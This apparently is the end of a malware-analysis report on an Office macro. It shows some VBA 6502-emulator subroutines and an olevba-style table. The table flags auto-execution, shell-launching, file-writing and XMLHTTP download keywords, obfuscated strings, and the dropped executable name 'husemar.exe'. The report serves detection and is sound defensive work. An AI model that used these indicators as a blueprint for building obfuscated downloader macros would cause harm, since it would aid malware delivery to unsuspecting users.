1060.  s = (s - 1) And &HFF
1061. End Sub
1062. Public Sub ply6502()
1063.  s = (s + 1) And &HFF
1064.  Y = Read6502(s + &H100)
1065.  If (Y) Then
1066.  P = P And &HFD
1067.  Else
1068.  P = P Or &H2
1069.  End If
1070.  If (Y And &H80) Then
1071.  P = P Or &H80
1072.  Else
1073.  P = P And &H7F
1074.  End If
1075. End Sub
1076.  
1077.  
1078.  
1079. +------------+----------------------+-----------------------------------------+
1080. | Type       | Keyword              | Description                             |
1081. +------------+----------------------+-----------------------------------------+
1082. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
1083. | Suspicious | Open                 | May open a file                         |
1084. | Suspicious | Shell                | May run an executable file or a system  |
1085. |            |                      | command                                 |
1086. | Suspicious | WScript.Shell        | May run an executable file or a system  |
1087. |            |                      | command                                 |
1088. | Suspicious | Run                  | May run an executable file or a system  |
1089. |            |                      | command                                 |
1090. | Suspicious | Shell.Application    | May run an application (if combined     |
1091. |            |                      | with CreateObject)                      |
1092. | Suspicious | CreateObject         | May create an OLE object                |
1093. | Suspicious | Chr                  | May attempt to obfuscate specific       |
1094. |            |                      | strings                                 |
1095. | Suspicious | Xor                  | May attempt to obfuscate specific       |
1096. |            |                      | strings                                 |
1097. | Suspicious | ADODB.Stream         | May create a text file                  |
1098. | Suspicious | SaveToFile           | May create a text file                  |
1099. | Suspicious | Write                | May write to a file (if combined with   |
1100. |            |                      | Open)                                   |
1101. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
1102. |            |                      | (obfuscation: VBA expression)           |
1103. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
1104. |            |                      | may be used to obfuscate strings        |
1105. |            |                      | (option --decode to see all)            |
1106. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
1107. |            | Strings              | may be used to obfuscate strings        |
1108. |            |                      | (option --decode to see all)            |
1109. | IOC        | husemar.exe          | Executable file name (obfuscation: VBA  |
1110. |            |                      | expression)                             |
1111. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
1112. | VBA string | Das Modell kann nun  | "Das Modell kann nun bearbeitet werden. |
1113. |            | bearbeitet werden.   | " &  "Ge?nderte Default-Werte werden    |
1114. |            | Ge?nderte Default-   | beim Schliessen exportiert."            |
1115. |            | Werte werden beim    |                                         |
1116. |            | Schliessen           |                                         |
1117. |            | exportiert.          |                                         |
1118. | VBA string | \husemar.exe         | "\" + "husemar." + "e" + "xe"           |
1119. +------------+----------------------+-----------------------------------------+